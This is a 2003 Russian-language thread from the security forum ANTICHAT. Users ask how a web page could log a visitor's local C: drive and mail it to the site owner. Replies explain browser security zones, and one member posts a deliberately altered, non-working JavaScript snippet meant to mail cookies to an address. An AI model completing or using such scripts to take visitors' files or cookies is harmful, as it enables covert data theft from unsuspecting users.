HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.10.2003, 20:53
Guest
Сообщений: n/a
С нами:

Репутация:
По умолчанию

Народ, у меня идея есть...Все знают скрипт, когда на твой сайт заходит чел, то он видит свой C: (если он не через анонимомайзер) ...Его можно дописать, что бы его диск, вносился  в лог-файл и высылался на определенный мейл...
Я долго ломал башку, но так и не доперло...
Подскажите
 

  #2  
Старый 04.10.2003, 22:45
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию

Так просто не получится.
Есть такое понятие как зона безопасности.
Твой диск находится в зоне "Мой компьютер", а страница открывается из зоны "Интернет", а доступ из документов одной зоны, к документам другой зоны запрещен.
Так например такой код:

<iframe id="localdisk" src="c:\temp.html"></iframe>
< script>
alert(localdisk.document.innerHTML)
</script>

работать не будет, если он размещен на инетовской страничке(зона "Интернет&quot. Будет выдаваться ошибка "Доступ запрещен".
А если это фрагмент файла, открываемого со своей машины (зона "Мой компьютер&quot, то работать будет ))
 

  #3  
Старый 05.10.2003, 14:33
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
С нами: 11893346

Репутация: 45


Smile

Речь идет даже не о хаке, а о простом просмотре диска c...
 

  #4  
Старый 06.10.2003, 12:21
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию

А что, "просто просмотр диска С" это не хак ??
 

  #5  
Старый 11.10.2003, 01:19
next
Новичок
Регистрация: 16.08.2003
Сообщений: 20
С нами: 11965788

Репутация: 0
По умолчанию

скрипт < script>javascript:navigate('file:///c:/&#39</script> ,помещённый где то,срабатывает на машине юзера и каждый видит свой диск С:,а просмотреть чужой конечно можно,но не скриптом на веб странице,скрипт может выяснять только наличие определённых файлов,причём находящихся, как говорится по умалчиванию и не больше,а вот кто знает,как эта мулька работает?  http://www.danasoft.com/vipersig.jpg  
да,это снифер,но через чур уж прикольный, ещё и умничает в нижней строке (в опере правда ошибается,хотя может в настройках оперы стоит инициировать её как MSIE...)
 

  #6  
Старый 12.10.2003, 17:35
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
С нами: 11893346

Репутация: 45


По умолчанию

есть такая феня:
< script language=javascript>
var cook=show_all_cookies();
document.open("cookies",cook);
document.write('<form onsubmit="javascript:window.close();"
method=post action="mailto:ваше мыло@mail.ru"
ENCTYPE="text/plain"><input type=hidden
name=h1 value=',cook,'><input type=submit value="Доброго времени суток!">
</form>'
document.close("cookies"
</SCRIPT>
(скрипт в целях безопасности был немного изменён)
НО она Изменена!!!
Я не могу найти оригинал...хотя даже в книге написано именно так...вроде тут все верно, хотя реально он не пашет...(((
 

  #7  
Старый 12.10.2003, 21:58
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию

И что это ?
Насколько я понял это должно отсылать куки на мыло?
Кстати в скрипте вызывается функция show_all_cookies(), но ее описания нет.
И кстати чтение куков других сайтов не допускается системой безопасности браузера (по кр мере в IE; в опере система немного попроще..)
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.